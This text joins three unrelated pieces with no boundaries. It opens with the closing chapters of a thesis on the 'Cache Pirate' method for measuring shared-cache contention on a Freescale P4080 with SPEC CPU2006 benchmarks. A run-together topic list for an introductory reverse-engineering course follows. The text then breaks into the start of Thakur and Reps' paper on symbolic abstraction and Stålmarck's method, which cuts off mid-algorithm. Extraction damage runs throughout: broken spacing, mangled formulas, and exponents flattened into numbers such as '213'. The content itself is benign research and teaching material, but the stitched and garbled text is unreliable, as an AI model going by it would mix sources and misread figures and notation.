with bits 0-12 (13 bits) unset. To achieve this, the working set needs to be
aligned on 8KB boundaries (213).
However, LLCs are physically-indexed, which means as we said before
that the physical address is used to index the cache. Thus, if we want to
control where data end up in the cache, we need to control the physical
addresses. This becomes a problem because since the memory is paged,
there is no guaranty that the pages will be contiguous in memory, which
prevents us from controlling the addresses of the elements in the working set,
which in turn prevents us from placing elements in the cache as we wish.
A way to work around this issue is to use large memory pages in order
to be sure that our working set will be allocated as a contiguous block in
physical memory. Coupled with the use of an aligned allocation routine as
explained above, this allows us to know where each datum will end up in the
cache.
3.3 How to steal more cache?
We said before that when the Pirate’s working set size increases, the access
rate decreases, down to a point where the rest of the system fights back hard
enough to start evicting the Pirate’s data. This puts a limit on how much
cache the Pirate can steal (which depends heavily on how hard the target
application and the rest of the system fight back)
To go beyond this limit, we can run several Pirates. By splitting the
working set between each instance, they will each have a smaller working set
to iterate on, and thus a higher access rate.
However, when contending for a space in the shared cache, the different
instances will make no distinction between them and the rest of the system,
which means that they will also fight each other.
Furthermore, since each Pirate should run on one core, this will reduce
even more the number of cores available to the target application.
22
Chapter 4
Results
4.1 Results from the micro-benchmark
The micro-benchmark developed during this thesis work was created to get a
better understanding of how the memory hierarchy works, but also to validate
the Pirate. The idea here is that the micro-benchmark can expose the size
and latency of each part of the memory system.
Thus, if we steal a part of the LLC with the Pirate, and then co-run it
with the micro-benchmark, it should show that the LLC indeed looks smaller.
This is what has been done and Figure 4.1 shows the result.
23
Figure 4.1: micro-benchmark co-run with Pirates stealing different cache
sizes
The tests were run on the Freescale P4080 (8 cores, 32KB L1, 128KB L2,
2MB L3). The benchmark uses a random access pattern to defeat prefetching
and large memory pages to hide TLB effects.
The red line shows the benchmark results with no Pirate running. Each
level of the memory hierarchy is visible. Particularly, we can notice that the
benchmark gets slower when the working set size becomes larger than 2MB
(221), meaning that we are hitting the main memory.
The green line shows us what happens when we run the same benchmark
with a Pirate stealing 1MB of cache. We can see that the benchmarks gets
24
slowed down when the working set becomes as soon as its working set becomes
bigger than 1MB (220). This is expected (and desired!) and due to the fact
that the Pirate is already stealing 1MB, thus reducing the cache capacity
available for the benchmark to 1MB.
The blue line represents the benchmark results when a Pirate is trying to
steal 1.5MB. We would expect the performance to get slower above 512KB
(219), but actually the line looks very similar to the green line. This is because
the Pirate is not able to steal that much cache.
Finally, the purple line shows what happens when we run two Pirates,
stealing 0.75MB each (for a total of 1.5MB). Now the knee appears indeed
when the working set grows above 512KB, which means that the benchmark
only has access to 512KB of LLC space.
4.2 SPEC CPU2006 results
Several benchmarks from the SPEC CPU2006 benchmark suite were co-run
with a Pirate stealing different cache sizes.
Table 4.1 shows the execution for the 401.bzip2 benchmark when con-
tending with a Pirate.
Amount of cache available Execution time (seconds)
2MB 33.5
1.75MB 34.9
1.5MB 35.9
1MB 37.4
512KB 40.2
Table 4.1: Results for 401.bzip2 co-run with the Pirate stealing different
cache sizes
We can see that although the Pirate and the benchmark obviously does
not share any data, the benchmark is slowed down when the Pirate is stealing
cache. Up to 1.5MB out of 2MB were stolen from the LLC. The performance
dropped there by 20%.
25
Amount of cache available Execution time (seconds)
2MB 58.8
1.75MB 61.7
1.5MB 64.1
1MB 68.4
512KB 74.4
Table 4.2: Results for 433.milc co-run with the Pirate stealing different cache
sizes
Table 4.2 shows the results for 433.milc. Here, the performance drop went
as far as 26.6%.
The important slowdown caused by reducing the shared cache capacity
tells us that these applications rely heavily on the LLC. If the shared cache
capacity is reduced, this application starts to fetch data from RAM instead
which has been shown to be significantly slower.
Nevertheless, other benchmarks, such as 470.lbm were much less sensitive
to reducing the shared cache capacity.
26
Chapter 5
Conclusion, related and future
work
The goal of this work was to implement the Cache Pirating method on Eric-
sson’s system in order to study the effect on performance of sharing a cache
between cores.
During this thesis, a Pirate has been written that can run on both Linux
and the commercial OS used by Ericsson, and it has been successfully used
to test several applications, both from the SPEC CPU2006 benchmark suite
and from Ericsson’s own programs.
Compared to the original work done by the UART team, some different
choices were made. The Pirate written as part of this work use a random
access pattern in order to defeat prefetching which makes monitoring easier.
Monitoring itself is done by continuously timing the Pirate and looking for
sudden slowdowns.
Multicore processors have become a norm and the need for performance
keeps rising every day, so studying the effect of sharing resources in a multi-
core processors is of primary importance. In the same vein than the Cache
Pirate, the UART team created the Bandwidth Bandit, which works in the
same vein as the Cache Pirate, but focuses on stealing only the memory
bandwidth.
5.1 Related work
Multicore processors have become a norm and the need for performance keeps
rising every day, so studying the effect of sharing resources in a multicore pro-
cessors is of primary importance. In the same vein than the Cache Pirate, the
27
UART team created the Bandwidth Bandit, which works in the same vein
as the Cache Pirate, but focuses on stealing only the memory bandwidth [4].
U. Drepper [13] provides comprehensive yet detailed informations about
the memory hierarchy, performance analysis, operating systems and what
a programmer can do to optimize his program in regard to the memory
hierarchy.
Wulf & McKee [14] have shown that the increasing gap between the speed
of CPUs and that of RAM memory speed will become a major problem, up
to a point where the memory speed will become the major bottleneck.
Others have studied the effect of sharing a cache between cores. StatCC
[15] is a statistical cache contention model also created by the UART team
that takes as an input is a reuse distance distribution that must be collected
beforehand and leverages StatStack [16], a probabilistic cache model, to es-
timate the cache miss ratio of co-scheduled applications and their CPIs.
The M ̈ alardalen Real-Time Research Center (MRTC) has been working
on feedback-based generation of hardware characteristics, where a model
is derived from running a production system. This model is then used to
generate a similar load on different part of the hardware, such as the caches,
without running the real production system [17].
28
Acknowledgments
I would like to thank David Black-Schaffer and Erik Berg for giving me the
opportunity to work on this interesting project, as well as for their supervision
during this work. I would also like to thank all the members of the Quantum
team at Ericsson for their precious help. Finally, I would like to thank my
friends and my family for their unconditional support and faith.
29
List of Figures
2.1 The memory hierarchy . . . . . . . . . . . . . . . . . . . . . . 6
2.2 A direct-mapped cache . . . . . . . . . . . . . . . . . . . . . . 9
2.3 A direct-mapped cache . . . . . . . . . . . . . . . . . . . . . . 10
2.4 Freescale P4080 Block Diagram . . . . . . . . . . . . . . . . . 14
2.5 micro-benchmark on the P4080 . . . . . . . . . . . . . . . . . 15
4.1 micro-benchmark co-run with Pirates stealing different cache
sizes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
30
Bibliography
[1] Herb Sutter, The free lunch is over . Date accessed: 2013-07-24.
http://www.gotw.ca/publications/concurrency-ddj.htm, 2005.
[2] Herb Sutter, Welcome to the hardware jungle ,
Date accessed: 2013-07-24. http://herbsutter.com/welcome-to-the-
jungle/, 2011.
[3] D. Eklov, N. Nikoleris, D. Black-Schaffer, E. Hagersten, Cache Pirating:
Measuring the curse of the shared cache , in 2011 International Confer-
ence on Parallel Processing (ICPP) 2011, pages 165-175
[4] D. Eklov, N. Nikoleris, D. Black-Schaffer, E. Hagersten, Bandwidth ban-
dit: Understanding memory contention , in International Symposium on
Performance Analysis of Systems and Software (ISPASS) 2012, pages
116-117
[5] LWN.net, Huge pages: Interfaces , Date accessed: 2013-07-24.
https://lwn.net/Articles/375096/
[6] Linux Documentation, Transparent Hugepage support , Date accessed:
2013-07-24. http://lwn.net/Articles/423592/
[7] Wikipedia, Cache algorithms , Date accessed: 2013-07-24.
http://en.wikipedia.org/wiki/Cache algorithms
[8] Roguewave, Fetch ratio , Date accessed: 2013-07-24.
http://www.roguewave.com/portals/0/products/threadspotter/docs/2011.2/
manual html linux/manual html/ch03s08.html
[9] Kernel.org, Linux’ perf tool , Date accessed: 2013-07-24.
https://perf.wiki.kernel.org/index.php/Main Page
[10] Intel, Performance Analysis Guide for Intel Core i7 Processor and In-
tel Xeon 5500 processor , p13 section “Uncore performance monitoring
(PMU)”.
31
[11] Linux Manpages, posix memalign ()manpage ,
Date accessed: 2013-07-24. http://linux.die.net/man/3/posix memalign
[12] Linux Manpages, clock gettime ()manpage , Date accessed: 2013-07-24.
http://linux.die.net/man/3/clock gettime
[13] Ulrich Drepper, What every programmer should know about memory ,
Date accessed: 2013-07-24. www.akkadia.org/drepper/cpumemory.pdf
[14] Wm. A. Wulf, Sally A. McKee, Hitting the memory wall: implications of
the obvious , in ACM SIGARCH Computer Architecture News Volume
23 Issue 1, March 1995, pages 20-24
[15] D. Eklov, D. Black-Schaffer, E. Hagersten, StatCC: A statistical cache
contention model , in PACT ’10 Proceedings of the 19th international
conference on Parallel architectures and compilation techniques, pages
551-552
[16] D. Eklov, E. Hagersten, StatStack: Efficient modeling of LRU caches ,
in IEEE International Symposium on Performance Analysis of Systems
& Software (ISPASS) 2010, pages 55-65
[17] M. J ̈ agemar, S. Eldh, A. Ermedahl, B. Lisper, Towards Feedback-Based
Generation of Hardware Characteristics , in 7th International Workshop
on Feedback Computing 2012
32What is Reverse Engineering (RE)?RefresherKnow your toolsA basic RE algorithmIntroduction to Reverse Engineering SoftwareFine-granularity class topics coveredFrank PozCC BY AT licensedhosted at OpenSecurityTraining.infoclick on green nodes to jump to that topic in the videosDebuggingDay 1 review 1Analyzing C++About the next classOther languagesDay 2 review
Day 1 review 2 Applying the RE algorithm to the bomb lab Phase 1Labs OutlineSetting a bomb lab answers filePhase 2 introductionPhase 3 introductionPhase 4 introductionPhase 5 introductionPhase 6 introduction 1IDA ProIntro x86PE FilesAlgorithmsData Types & StructuresWhat kind of questions can you answer with RE?
For loopsArray accessesMultiple/variable argument functionsPhase 2 walkthroughPhase 3 walkthroughRecursionPhase 4 walkthroughString decodingbitmasksPhase 5 walkthroughNested loopsStructuresPhase 6 introduction 2Structs example: struct_introduction.ex_Defining structs in IDAApplying structs to assembly in IDAApplying structs to memory in IDAPhase 6 walkthrough 1Loop collapsing in IDA Identifying a linked list in memoryDefining the struct in IDAApplying a struct to a memory block in IDAPhase 6 walkthrough 2JavaThe "this" pointer and virtual function tables ("vtables") Object member accessConstructors and DestructorsExample: class_0.ex_Example: class_1.ex_Inheritance Example: class_2.ex_
Understanding the first nested loopsUnderstanding the next set of nested loopsUnderstanding the last loopAnalyzing the pseudo-codeLinked listsReminder: What is "dl" (or al or bl or cl)?Why use a debugger?Types of breakpointsIDA as a debuggerSingle steppingConditional jumps in IDAEFLAGS register in IDAPassing command line arguments to a debugged program in IDA
Stack frame explanationA Method for Symbolic Computation
of Abstract Operations⋆
Aditya Thakur1and Thomas Reps1,2
1University of Wisconsin; Madison, WI, USA
2GrammaTech, Inc.; Ithaca, NY, USA
Abstract. This paper helps to bridge the gap between (i) the use of
logic for specifying program semantics and performing prog ram analy-
sis, and (ii) abstract interpretation. Many operations nee ded by an ab-
stract interpreter can be reduced to the problem of symbolic abstraction :
the symbolic abstraction of a formula φin logicL, denoted by ˆα(φ),
is the most-precise value in abstract domain Athat over-approximates
the meaning of φ. We present a parametric framework that, given L
andA, implements ˆα. The algorithm computes successively better over-
approximations of ˆα(φ). Because it approaches ˆα(φ) from “above”, if it
is taking too much time, a safe answer can be returned at any st age.
Moreover, the framework is“dual-use”: in addition to its ap plications in
abstract interpretation, it provides a new way for an SMT (Sa tisfiability
Modulo Theories) solver to perform unsatisfiability checki ng: given φ∈
L, the condition ˆα(φ) =⊥implies that φis unsatisfiable.
1 Introduction
This paper concerns the connection between abstract interpret ation and logic.
Like several previous papers [29,37,21,12], our work is based on t he insight that
many of the key operations needed by an abstract interpreter ca n be reduced to
the problem of symbolic abstraction [29].
Suppose thatAis an abstract domain with concretization function γ:A→
C. Given a formula φin logicL, let [[φ]] denote the meaning of φ—i.e., the set of
concrete states that satisfy φ. Thesymbolic abstraction ofφ, denoted by ˆα(φ),
is the bestAvalue that over-approximates [[ φ]]:ˆα(φ) is the unique value A∈A
such that (i) [[ φ]]⊆γ(A), and (ii) for all A′∈Afor which [[φ]]⊆γ(A′),A⊑A′.
This paper presents a new framework for performing symbolic abst raction,
discusses its properties, and presents several instantiations fo r various logics and
abstract domains. In addition to providing insight on fundamental lim its, the
⋆This research is supported, in part, by NSF under grants CCF- {0810053, 0904371 },
by ONR under grants N00014- {09-1-0510, 10-M-0251 }, by ARL under grant
W911NF-09-1-0413, by AFRL under grants FA9550-09-1-0279 a nd FA8650-10-C-
7088; and by DARPA under cooperative agreement HR0011-12-2 -0012. Any opin-
ions, findings, and conclusions or recommendations express ed in this publication are
those of the authors, and do not necessarily reflect the views of the sponsoring agen-
cies. T. Reps has an ownership interest in GrammaTech, Inc., which has licensed
elements of the technology reported in this publication.
2 Aditya Thakur and Thomas Reps
new algorithm for ˆαalso performs well: our experiments show that it is 11.3
times faster than a competing method [29,21,12], while finding datafl ow facts
(i.e., invariants) that are equally precise at 76.9% of a program’s basic blocks,
better (tighter) at 19.8% of the blocks, and worse (looser) at only 3.3% of the
blocks.
Most-Precise Abstract Interpretation. Suppose thatG=C−−−→←−−−
αγAis a
Galois connection between concrete domain Cand abstract domain A. Then the
“best transformer” [7], or best abstract post operator for tra nsitionτ, denoted
byˆPost[τ] :A→A, is the most-precise abstract operator possible, given A, for
the concrete post operator for τ, Post[τ] :C→C.ˆPost[τ] can be expressed in
terms ofα,γ, and Post[τ], as follows [7]: ˆPost[τ] =α◦Post[τ]◦γ. This equation
defines the limit of precision obtainable using abstraction A. However, it is non-
constructive; it does not provide an algorithm , either for applying ˆPost[τ] or for
finding a representation of the function ˆPost[τ]. In particular, in many cases, the
application of γto an abstract value would yield an intermediate result—a set
of concrete states—that is either infinite or too large to fit in compu ter memory.
Symbolic Abstract Operations. The aforementioned problem with applying
γcan be side-stepped by working with symbolic representations of sets of states
(i.e., using formulas in some logic L). The use ofLformulas to represent sets
of states is convenient because logic can also be used for specifying a language’s
concrete semantics; i.e., the concrete semantics of a transforme r Post[τ] can be
stated as a formula φτ∈ Lthat specifies the relation between input states
and output states. However, the symbolic approach introduces a new challenge:
how to bridge the gap between LandA[29]. In particular, we need to develop
(i) algorithms to handle interconversion between formulas of Land abstract
values inA, and (ii) symbolic versions of the operations that form the core
repertoire at the heart of an abstract interpreter.
1.ˆγ(A): Given an abstract value A∈ A, thesymbolic concretization ofA,
denoted by ˆγ(A), mapsAto a formula ˆγ(A) such that Aandˆγ(A) represent
the same set of concrete states (i.e., γ(A) = [[ˆγ(A)]]).
2.ˆα(φ): Givenφ∈L, the symbolic abstraction of φ, denoted by ˆα(φ), mapsφ
to the best value in Athat over-approximates [[ φ]] (i.e.,ˆα(φ) =α([[φ]])).
3.ˆAssume[φ](A): Givenφ∈LandA∈A,ˆAssume[φ](A) returnsthebestvalue
inAthat over-approximates the meaning of φin concrete states described
byA. That is, ˆAssume[φ](A) equalsα([[φ]]∩γ(A)).
4. Creation of a representation of ˆPost[τ]: Some intraprocedural [15] and many
interprocedural [32,22] dataflow-analysis algorithms operate on instances of
an abstract datatype Tthat (i) represents a family of abstract functions
(or relations), and (ii) is closed under composition and join. By “crea tion
of a representation of ˆPost[τ]”, we mean finding the best instance in Tthat
over-approximates Post[ τ].
Several other symbolic abstract operations are discussed in §6.
Experience shows that, for most abstract domains, it is easy to wr ite aˆγ
function (item 1) [29]. The other three operations are inter-relate d.ˆα(item 2)
A Method for Symbolic Computation of Abstract Operations 3
can be reduced to ˆAssume (item 3) as follows: ˆα(φ) =ˆAssume[φ](⊤).Item 4 can
be reduced to item 2 as follows: The concrete post operator Post[ τ] corresponds
to a formula φτ∈Lthat expresses the transition relation between input states
and output states. An instance of abstract datatype Tin item 4 represents
an abstract-domain element that denotes an over-approximation of [[φτ]].ˆα(φτ)
computes the best instance in Tthat over-approximates [[ φτ]].
Thispaperpresentsaparametricframeworkthat, forsomeabst ractdomains,
is capable of performing most-precise abstract operations in the lim it. Because
the method approaches its result from “above”, if the computatio n takes too
much time, it can be stopped to yield a safe result—i.e., an over-appro ximation
to the best abstract operation—at any stage. Thus, the framew ork provides
a tunable algorithm that offers a performance-versus-precision t rade-off. We
replace “ ˆ” with “  ̃” to denote over-approximating operators—e.g.,  ̃α(φ),
A ̃ssume[φ](A), and ̃Post[τ](A).3
Key Insight. In [35], we showed how St ̊ almarck’s method [33], an algorithm for
satisfiability checkingof propositionalformulas, can be explained us ing abstract-
interpretation terminology—in particular, as an instantiation of a mo re general
algorithm, St ̊ almarck[ A], that is parameterized by a (Boolean) abstract domain
Aand operations on A. The algorithm that goes by the name “St ̊ almarck’s
method” is one instantiation of St ̊ almarck[ A] with a certain abstract domain.
Abstract value A′is asemantic reduction [7]ofAwith respect to φif
(i)γ(A′)∩[[φ]] =γ(A)∩[[φ]], and (ii)A′⊑A. At each step, St ̊ almarck[ A] holds
someA∈A; each of the so-called “propagation rules” employed in St ̊ almarck’s
method improves Aby finding a semantic reduction of Awith respect to φ.
The key insight of the present paper is that there is a connection be tween
St ̊ almarck[A] and ̃αA. In essence, to check whether a formula φis unsatisfiable,
St ̊ almarck[A] computes  ̃αA(φ) and performs the test “  ̃αA(φ) =⊥A?” If the test
succeeds, it establishes that [[ φ]]⊆γ(⊥A) =∅, and hence that φis unsatisfiable.
In this paper, we present a generalization of St ̊ almarck’s algorithm toricher
logics,suchasquantifier-freelinearrationalarithmetic(QF LRA)andquantifier-
free bit-vector arithmetic (QF BV). Instead of only using a Boolean abstract
domain, the generalized method of this paper also uses richer abstract domains ,
such as the polyhedral domain [8] and the bit-vector affine-relation sdomain [12].
By this means, we obtain algorithms for computing  ̃αfor these richer abstract
domains. The bottom line is that our algorithm is “dual-use”: (i) it can b e used
by an abstract interpreter to compute  ̃α(and perform other symbolic abstract
operations), and (ii) it can be used in an SMT (Satisfiability Modulo Theo ries)
solver to determine whether a formula is satisfiable.
Because we are working with more expressive logics, our algorithm us es sev-
eral ideas that go beyond what is used in either St ̊ almarck’s method [33] or
in St ̊ almarck[A] [35]. The methods described in this paper are also quite dif-
3 ̃Post[τ] is used by Graf and Sa ̈ ıdi [14] to mean a different state trans former from the
one that  ̃Post[τ] denotes in this paper. Throughout the paper, we use  ̃Post[τ] solely
to mean an over-approximation of ˆPost[τ]; thus, our notation is not ambiguous.
4 Aditya Thakur and Thomas Reps
ferent from the huge amount of recent work that uses decision pr ocedures in
program analysis. It has become standard to reduce program pat hs to formu-
las by encoding a program’s actions in logic (e.g., by symbolic execution) and
calling a decision procedure to determine whether a given path throu gh the pro-
gram is feasible. In contrast, the techniques described in this pape r adopt—and
adapt—the key ideas from St ̊ almarck’s method to create new algor ithms for key
program-analysis operations. Finally, the methods described in this paper are
quite different from previous methods for symbolic abstraction [29, 37,21,12],
which all make repeated calls to an SMT solver.
Contributions. The contributions of the paper can be summarized as follows:
–We present a connection between symbolic abstraction and St ̊ alma rck’s
method for checking satisfiability ( §2).
–We present a generalization of St ̊ almarck’s method that lifts the alg orithm
from propositional logic to richer logics ( §3).
–We present a new parametric framework that, for some abstract domains, is
capable of performing most-precise abstract operations in the limit , includ-
ingˆα(φ) andˆAssume[φ](A), as well as creating a representation of ˆPost[τ].
Because the method approaches most-precise values from “abov e”, if the
computation takes too much time it can be stopped to yield a sound re sult.
–We present instantiations of our framework for two logic/abstrac t-domain
pairs: QF BV/KS and QF LRA/Polyhedra, and discuss completeness ( §4).
–We present experimental results that illustrate the dual-use natu re of our
framework. One experiment uses it to compute abstract transfo rmers, which
are then used to generate invariants; another experiment uses it for checking
satisfiability (§5).
§6 discusses other symbolic operations. §7 discusses related work. Proofs can be
found in [36].
2 Overview
We now illustrate the key points of our St ̊ almarck-inspired techniqu e using two
examples.Thefirstshowshowourtechniqueappliestocomputingab stracttrans-
formers; the second describes its application to checking unsatisfi ability.
The top-level, overallgoalof St ̊ almarck’smethod can be underst ood in terms
of the operation  ̃α(ψ). However, St ̊ almarck’smethod is recursive (counting down
on a parameter k), and the operation performed at each recursive level is the
slightly more general operation A  ̃ssume[ψ](A). Thus, we will discuss A  ̃ssume.
Example 1. Consider the following x86 assembly code
L1: cmp eax, 2 L2: jz L4 L3: ...
The instruction at L1sets the zero flag ( zf) to true if the value of register eax
equals 2. At instruction L2, ifzfis true the program jumps to location L4(not
seen in the code snippet) by updating the value of the program coun ter (pc)
toL4; otherwise, control falls through to program location L3. The transition
formula that expresses the state transformation from the begin ning ofL1to the
A Method for Symbolic Computation of Abstract Operations 5
beginning of L4is thusφ= (zf⇔(eax= 2))∧(pc′=ITE(zf,L4,L3))∧(pc′=
L4)∧(eax′=eax). (φis a QFBV formula.)
LetAbe the abstract domain of affine relations over the x86 registers. L et
A0=⊤A, the empty set of affine constraints over input-state and output -state
variables. We now describe how our algorithm creates a representa tion of theA
transformer for φby computing A  ̃ssume[φ](A0). The result represents a sound
abstract transformer for use in affine-relation analysis (ARA) [27, 21,12]. First,
the ITE term in φis rewritten as ( zf⇒(pc′=L4))∧(¬zf⇒(pc′=L3)). Thus,
the transition formula becomes φ= (zf⇔(eax= 2))∧(zf⇒(pc′=L4))∧
(¬zf⇒(pc′=L3))∧(pc′=L4)∧(eax′=eax).
Next,propagation rules are used to compute a semantic reduction with re-
spect toφ, starting from A0. The main feature of the propagation rules is that
they are “local”; that is, they make use of only a small part of formu laφto
compute the semantic reduction.
1. Because φhas to be true, we can conclude that each of the conjuncts of φ
are also true; that is, zf⇔(eax= 2),zf⇒(pc′=L4),¬zf⇒(pc′=L3),
pc′=L4, andeax′=eaxare all true.
2. Suppose that we have a function μ ̃αAsuch that for a literal l∈L,A′=
μ ̃αA(l) is a sound overapproximation of ˆα(l). Because the literal pc′=L4
is true, we conclude that A′=μ ̃αA(pc′=L4) ={pc′−L4= 0}holds, and
thusA1=A0⊓A′={pc′−L4= 0}, which is a semantic reduction of A0.
3. Similarly, because the literal eax′=eaxis true, we obtain A2=A1⊓
μ ̃αA(eax′=eax) ={pc′−L4= 0,eax′−eax= 0}.
4. We know that ¬zf⇒(pc′=L3). Furthermore, μ ̃αA(pc′=L3) ={pc′−L3=
0}.Now{pc′−L3= 0}⊓A2is⊥,whichimpliesthat[[ pc′=L3]]∩γ({pc′−L4=
0,eax′−eax= 0}) =∅. Thus, we can conclude that ¬zfis false, and hence
thatzfis true. This value of zf, along with the fact that zf⇔(eax= 2)
is true, enables us to determine that A′′=μ ̃αA(eax= 2) ={eax−2 = 0}
must hold. Thus, our final semantic-reductionstep produces A3=A2⊓A′′=
{pc′−L4= 0,eax′−eax= 0,eax−2 = 0}.
Abstract value A3is a set of affine constraints over the registers at L1(input-
state variables) and those at L4(output-state variables), and can be used for
affine-relation analysis using standard techniques (e.g., see [19] or [1 2,§5]).⊓ ⊔
The above example illustrates how our technique propagates truth values
to various subformulas of φ. The process of repeatedly applying propagation
rules to compute A  ̃ssume is called 0-assume. The next example illustrates the
Dilemma Rule , a more powerful rule for computing semantic reductions.
Example 2. LetLbe QFLRA, and letAbe the polyhedral abstract domain [8].
Consider the formula ψ= (a0< b0)∧(a0< c0)∧(b0< a1∨c0< a1)∧(a1<
b1)∧(a1< c1)∧(b1< a2∨c2< a2)∧(a2< a0)∈L(see Fig. 1(a)). Suppose
that we want to compute A  ̃ssume[ψ](⊤A).
To make the communication between the truth values of subformula s
and the abstract value explicit, we associate a fresh Boolean variab le with
each subformula of ψto give a set of integrity constraints I. In this case,
6 Aditya Thakur and Thomas Reps
a0c0b0a1c1b1a2∨∨ ∨∨ ∨∨ ∨∨(P 0,A 0)
(P 1,A 1)' ' (P 2,A 2)''(P 0,A 0) 6(B,o)= (P 2,A 2) (P 1,A 1) = (P 0,A 0) 6(B, o)
(P 3,A 3) (P 1,A 1)' '(P 2,A 2)''7=b tb
bt
tb
(a) (b)
Fig.1.(a) Inconsistent inequalities in the (unsatisfiable) formu la used in Ex. 2. (b)
Application of the Dilemma Rule to abstract value ( P0,A0). The dashed arrows from
(Pi,Ai) to (P′
i,A′
i) indicate that ( P′
i,A′
i) is a semantic reduction of ( Pi,Ai).
Iψ={u1⇔⋀8
i=2ui,u2⇔(a0< b0),u3⇔(a0< c0),u4⇔(u9∨u10),u5⇔(a1<
b1),u6⇔(a1< c1),u7⇔(u11∨u12),u8⇔(a2< a0),u9⇔(b0< a1),u10⇔(c0<
a1),u11⇔(b1<a2),u12⇔(c1<a2)}. The integrityconstraintsencodethe struc-
ture ofψvia the set of Boolean variables U={u1,u2,...,u 12}. WhenIis used
as a formula, it denotes the conjunction of the individual integrity c onstraints.
We now introduce an abstraction over U; in particular, we use the Cartesian
domainP= (U→{0,1,∗})⊥in which∗denotes “unknown”, and each element
inPrepresents a set of assignments in P(U→{0,1}). We denote an element of
the Cartesian domain as a mapping, e.g., [ u1↦→0,u2↦→1,u3↦→∗], or [0,1,∗]
ifu1,u2, andu3are understood.⊤Pis the element λu.∗. The “single-point”
partial assignment in which variable vis set tobis denoted by⊤P[v↦→b].
The variable u1∈Urepresents the root of ψ; consequently, the single-point
partial assignment ⊤P[u1↦→1] corresponds to the assertion that ψis satisfiable.
In fact, the models of ψare closely related to the concrete values in [[ I]]∩
γ(⊤P[u1↦→1]). For every concrete value in [[ I]]∩γ(⊤P[u1↦→1]), its projection
onto{ai,bi,ci|0≤i≤1}∪{a2}gives us a model of ψ; that is, [[ψ]] = ([[I]]∩
γ(⊤P[u1↦→1]))|({ai,bi,ci|0≤i≤1}∪{a2}). By this means, the problem of computing
A ̃ssume[ψ](⊤A) is reduced to that of computing A  ̃ssume[I]((⊤P[u1↦→1],⊤A)),
where (⊤P[u1↦→1],⊤A) is an element of the reduced product of PandA.
Becauseu1is true in⊤P[u1↦→1], the integrity constraint u1⇔⋀8
i=2ui
implies that u2...u8are also true, which refines ⊤P[u1↦→1] toP0=
[1,1,1,1,1,1,1,1,∗,∗,∗,∗].Becauseu2istrueandu2⇔(a0<b0)∈I,⊤Acanbe
refinedusing μ ̃αA(a0<b0) ={a0−b0<0}.Doingthesamefor u3,u5,u6,andu8,
refines⊤AtoA0={a0−b0<0,a0−c0<0,a1−b1<0,a1−c1<0,a2−a0<0}.
These steps refine ( ⊤P[u1↦→1],⊤A) to (P0,A0) via 0-assume.
To increase precision, we need to use the Dilemma Rule, a branch-and -merge
rule, in which the current abstract state is split into two (disjoint) a bstract
states, 0-assume is applied to both abstract values, and the resu lting abstract
values are merged by performing a join. The steps of the Dilemma Rule are
shown schematically in Fig. 1(b) and described below.
A Method for Symbolic Computation of Abstract Operations 7
In our example, the value of u9is unknown in P0. LetB∈Pbe⊤P[u9↦→0];
thenB,theabstractcomplementof B,is⊤P[u9↦→1].Notethat γ(B)∩γ(B) =∅,
andγ(B)∪γ(B) =γ(⊤). The current abstract value ( P0,A0) is split into
(P1,A1) = (P0,A0)⊓(B,⊤) and (P2,A2) = (P0,A0)⊓(B,⊤).
Now consider 0-assume on ( P1,A1). Becauseu9is false, and u4is true, we can
conclude that u10has to be true, using the integrity constraint u4⇔(u9∨u10).
Becauseu10holds andu10⇔(c0<a1)∈I,A1can be refined with the constraint
c0−a1<0. Because a0−c0<0∈A1,a0−a1<0 can be inferred. Similarly,
when performing 0-assume on ( P2,A2),a0−a1<0 is inferred. Call the abstract
values computed by 0-assume ( P′
1,A′
1) and (P′
2,A′
2), respectively. At this point,
the join of ( P′
1,A′
1) and (P′
2,A′
2) is taken. Because a0−a1<0 is present in both
branches, it is retained in the join. The resulting abstract value is ( P3,A3) =
([1,1,1,1,1,1,1,1,∗,∗,∗,∗],{a0−b0<0,a0−c0<0,a1−b1<0,a1−c1<
0,a2−a0<0,a0−a1<0}. Note that although P3equalsP0,A3is strictly more
precise than A0(i.e.,A3⊏A0), and hence ( P3,A3) is a semantic reduction of
(P0,A0) with respect to ψ.
Now suppose ( P3,A3) is split using u11. Using reasoning similar to that
performed above, a1−a2<0 is inferred on both branches, and hence so is
a0−a2<0. However, a0−a2<0 contradicts a2−a0<0; consequently, the ab-
stractvaluereducesto( ⊥P,⊥A)onbothbranches.Thus,A  ̃ssume[ψ](⊤A) =⊥A,
and henceψis unsatisfiable. In this way, A  ̃ssume instantiated with the polyhe-
dral domain can be used to decide the satisfiability of a QF LRA formula. ⊓ ⊔
The process of repeatedly applying the Dilemma Rule is called 1-assume .
Thatis,repeatedlysomevariable u∈Uisselectedwhosetruthvalueisunknown,
the current abstract value is split using B=⊤P[u↦→0] andB=⊤P[u↦→1],
0-assume is applied to each of these values, and the resulting abstr act values
are merged via join (Fig. 1(b)). Different policies for selecting the ne xt variable
on which to split can affect how quickly an answer is found; however, a ny fair
selection policy will return the same answer. The efficacy of the Dilemm a Rule
is partially due to case-splitting; however, the real power of the Dile mma Rule
is due to the fact that it preserves information learned in both branches when a
case-split is “abandoned” at a join point .
The generalization of the 1-assume algorithm is called k-assume: rep eatedly
some variable u∈ Uis selected whose truth value is unknown, the current
abstract value is split using B=⊤P[u↦→0] andB=⊤P[u↦→1]; (k–1)-assume
is applied to each of these values; and the resulting values are merge d via join.
However, there is a trade-off: higher values of kgive greater precision, but are
also computationally more expensive.
For certain abstract domains and logics, A  ̃ssume[ψ](⊤A) is complete—i.e.,
with a high-enough value of kfor k-assume, A  ̃ssume[ψ](⊤A) always computes
the most-precise Avalue possible for ψ. However, our experiments show that
A ̃ssume[ψ](⊤A) has very good precision with k= 1 (see§5)—which jibes with
the observation that, in practice, with St ̊ almarck’s method for pr opositional
validity (tautology) checking “a formula is either [provable with k= 1] or not a
tautology at all!” [18, p. 227].
8 Aditya Thakur and Thomas Reps
Algorithm 1: A ̃ssume[φ](A)
1⟨I,uφ⟩←integrity( φ)
2P←⊤P[uφ↦→1]
3( ̃P, ̃A)←k-assume[I]((P,A))
4return  ̃A
Algorithm 2: 0-assume[I]((P,A))
1repeat
2(P′,A′)←(P,A)
3foreach J∈Ido
4ifJhas the form u⇔lthen
5(P,A)←LeafRule( J,(P,A))
6else
7(P,A)←InternalRule( J,(P,A))
8until((P,A) = (P′,A′))∥timeout
9return(P,A)Algorithm 3: k-assume[I]((P,A))
1repeat
2(P′,A′)←(P,A)
3foreach u∈Usuch that P(u) =∗do
4(P0,A0)←(P,A)
5(B,B)←(⊤P[u↦→0],⊤P[u↦→1])
6(P1,A1)←(P0,A0)⊓(B,⊤)
